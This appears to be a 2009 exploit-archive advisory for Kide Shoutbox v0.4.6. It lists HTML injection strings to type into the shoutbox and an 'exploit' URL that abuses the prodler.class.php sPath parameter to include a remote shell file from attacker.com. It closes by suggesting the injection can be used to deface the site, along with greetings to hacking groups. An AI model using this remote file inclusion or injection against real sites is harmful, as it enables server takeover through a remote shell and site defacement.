[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Kide Shoutbox v0.4.6 XSS & AXFR
# Published : 2009-12-02
# Author : andresg888
# Previous Title : Simple Machines Forum Multiple Security Vulnerabilities
# Next Title : Ciamos CMS <= 0.9.5 (module_path) Remote File Inclusion Vulnerability


##########################[andresg888]##########################
#Web: : www.ilegalintrusion.net<http://www.ilegalintrusion.net> & www.bl4ck-p0rtal.org<http://www.bl4ck-p0rtal.org>
########################################################################
#Exploit :
# Go to the shoutbox and type:
# <font color="red">red text</font>
# or
# <marquee>hi</marquee>
# or
# 
########################################################################
#3xplo!t :
#http://server/[path]/include/prodler.class.php?sPath=http://attacker.com/shell.txt???
########################################################################
#Greetz : _84kur10_ , Brunos_50
#Special Thanks : all members from ilegalintrusion & black-portal
########################################################################
# It is obvious that if you allow javascript or html injection code can make a document.Inner
# so with a little imagination could Defacer the site with a script.
###########################[andresg888#################################